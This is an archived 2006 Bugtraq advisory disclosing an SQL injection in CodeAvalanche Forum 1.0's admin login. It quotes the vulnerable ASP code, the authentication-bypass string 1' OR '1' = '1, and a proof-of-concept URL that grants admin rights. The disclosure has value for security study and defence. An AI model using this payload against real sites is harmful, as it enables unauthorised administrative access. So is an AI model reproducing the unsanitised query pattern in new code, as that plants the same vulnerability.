CA Forum Remote SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CA Forum Remote SQL Injection
From: omnipresent@xxxxxxxx
Date: 1 Jun 2006 17:09:10 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

------------------------------------------------------------------
               - CAForum 1.0 Remote SQL Injection -
   -= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------

            -= CodeAvalanche Forum Version 1.0 =-



Omnipresent
june 01, 2006


Vunerability(s):
----------------
SQL Injection



Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php


Description of product:
-----------------------

CodeAvalanche FreeForum is asp forum application which allows free posting, 
there is no needs for registration of your
visitors. Administrator can add unlimited number of forum categories.


Vulnerability / Exploit:
------------------------

In the file default.asp in Admin directory is vulnerable to an Remote SQL 
Injection Attack.
A malicious people can gain Admin rights by putting rights parameters in the 
Password Variable.

Let's Check the source code:

<% Response.Buffer = True 


userLogged=false
If Request("Password")<>"" Then 
'response.Write(Request("Password")) 
'response.flush

dim rsUser,selectSQL
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"


[...]



[End default.asp]

As you can see the variable Password is not properly sanitized before be used, 
so an attacker can put this string in the
password field:


1' OR '1' = '1

So, the query will be:

selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'


And you can gain access to the application with admin rights.


PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple Proof Of Concept used on my local machine:


http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@xxxxxxxx

Prev by Date: [ MDKSA-2006:094 ] - Updated evolution packages fix DoS (crash) vulnerability on certain messages.
Next by Date: Forensic memory dumping intricacies - PhysicalMemory, DD, and caching issues
Previous by thread: [ MDKSA-2006:094 ] - Updated evolution packages fix DoS (crash) vulnerability on certain messages.
Next by thread: Forensic memory dumping intricacies - PhysicalMemory, DD, and caching issues
Index(es):
- Date
- Thread